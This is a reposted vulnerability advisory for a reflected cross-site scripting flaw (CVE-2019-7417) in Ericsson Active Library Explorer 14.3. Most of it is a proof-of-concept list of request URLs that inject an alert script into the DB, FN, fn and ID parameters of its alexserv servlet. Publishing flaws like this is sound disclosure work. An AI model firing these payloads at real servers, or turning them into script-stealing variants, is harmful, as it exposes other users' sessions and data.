Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

#226
Topic created · 1 Posts · 0 Views
  • Ericsson Active Library Explorer (ALEX)
    version 14.3 suffers from a cross site scripting vulnerability.
    MD5 | be90b6131177b2b6605b05cead5c01d2
    Download

    <!--  
    # Exploit Title: Cross Site Scripting in Ericsson Active Library Explorer  
    Server Version 14.3  
    # Date: 23-01-2019  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.ericsson.com  
    # Software Link: http://www.ericsson.com  
    # Version: Ericsson Active Library Explorer Server Version 14.3  
    # Tested on: all  
    # CVE : CVE-2019-7417  
    # Category: webapps  
    1. Description  
    XSS exists in Ericsson Active Library Explorer (ALEX) 14.3 in multiple  
    parameters in the "/cgi-bin/alexserv" servlet, as demonstrated by the DB,  
    FN, fn, or id parameter.  
    Active Library Explorer (ALEX) is server-based software that enables users  
    to browse Ericsson document libraries and documents with a standard web  
    browser. It consists of the following two parts, which are typically used  
    in two different web browser windows:  
    Library View a this part contains functions for accessing libraries  
    within a folder structure. For example, it is possible to search for  
    libraries, download libraries, or compare library variants. It is also  
    possible to start a search for documents in several libraries at the same  
    time.  
    Document View a this part contains functions for accessing documents  
    inside a library. For example, it is possible to search for documents or  
    within documents in individual libraries, and to print or bookmark  
    documents.  
    2. Proof of Concept  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    id=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt  
    Parameter  
    id=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=23034&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=hlex_help.html  
    Parameter  
    ID=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=alex.html  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&ac=image&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    fn=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=alex_help.ahx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&CH=LibraryBrowser  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=12446-2885Uen.E.html  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&AC=image&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E  
    Parameter  
    FN=<SCRIPT>alert("XSS");</SCRIPT>  
    URL  
    http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=help.html&CH=LibraryBrowser  
    Parameter  
    DB=<SCRIPT>alert("XSS");</SCRIPT>  
    3. Solution:  
    Update to last version this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    

    Source: packetstormsecurity.com

Log in to reply